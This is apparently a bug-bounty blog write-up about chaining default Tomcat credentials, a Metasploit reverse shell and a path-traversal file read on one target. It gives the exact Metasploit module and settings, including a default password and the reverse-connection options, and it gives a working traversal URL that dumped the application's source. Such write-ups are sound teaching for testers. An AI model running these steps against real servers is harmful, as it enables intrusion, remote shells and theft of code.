How I chained multiple bugs to maximize the impact (Default Credentials -> Reverse Connection-> LFI)

Hello All, In the previous blog post, we saw how basic recon on Shodan helped us in finding tomcat service which was running on port 8082. We brute forced the credentials by using this list and eventually ended up logging on to the server. Post login, we uploaded a malicious .war file and got remote code execution.

In this blog post, Let me walk you through on how we can get reverse shell of the server which will help us in maximizing the impact.

Please note: The domain and other details have been masked for Confidentiality Purpose.

Here are the pre-requisites for this attack:

The first thing we need to do is identify if tomcat is running on the server. If tomcat is running, then we need to try/brute force credentials. This git repo can be used brute force credentials. This attack can be performed only if we have credentials for the tomcat server. We will be using Metasploit Framework for this attack.

So, let’s begin!!!

In our case, lets take the IP as X.X.X.X and the port is 8082. The credentials that worked for me are username=tomcat and password=s3cret. Now, let’s launch Metasploit.

Once Metasploit is successfully launched, type the following commands one after the other.

(Note: You need to give proper details for a successful attack)

use exploit/multi/http/tomcat_mgr_upload (This is the exploit)

set RHOSTS X.X.X.X (IP address of the remote machine)

set RPORT 8082 (Port on which tomcat is running on the remote machine)

set HttpPassword s3cret (Password of tomcat)

set HttpUsername tomcat (Username of tomcat)

set LHOST X.X.X.X (IP address of the machine on which you want reverse connection)

set LPORT 4444 (Port of the machine on which you want reverse connection)

exploit (Once all details are provided, we can use this command to launch the exploit)

It might give the following error:

Run the following command to get rid of the error and launch the exploit again.

set FingerprintCheck false

Wait for a few seconds for the exploit to run. The following screenshots show that the exploit ran successfully and gave the reverse connection of the machine.

This is the maximum impact but still wanted to show more impact. I had tried LFI to fetch a few sensitive files but it didn’t work.

After getting the shell, I noticed the /var/lib/ directory and the content inside it. The was a folder “tomcat9” which had “webapps” as a sub folder and that folder had the source code of the application.

I manually constructed the payload. The name of the file which contained the source code was “Webappcode.war”.

So, the payload became ../../../../../../var/lib/tomcat9/webapps/Webappcode.war

The application had a parameter called “template” which was fetching and downloading something. The final URL to exploit LFI became https://example.com/sh/doc?template=../../../../../../var/lib/tomcat9/webapps/Webappcode.war I tried this payload and Boooooooooooom!!!!, the source code was dumped successfully.

Golden Tip: To catch a thief, we need to think like one and you will eventually end up exploiting the vulnerability to show the maximum impact.

That’s it for this writeup.

Happy Hacking and Happy Testing!!!

Make sure you say a “Hi” to me if I could be of some help!

Twitter: @heybenchmarkkk

LinkedIn: Pawan Chhabria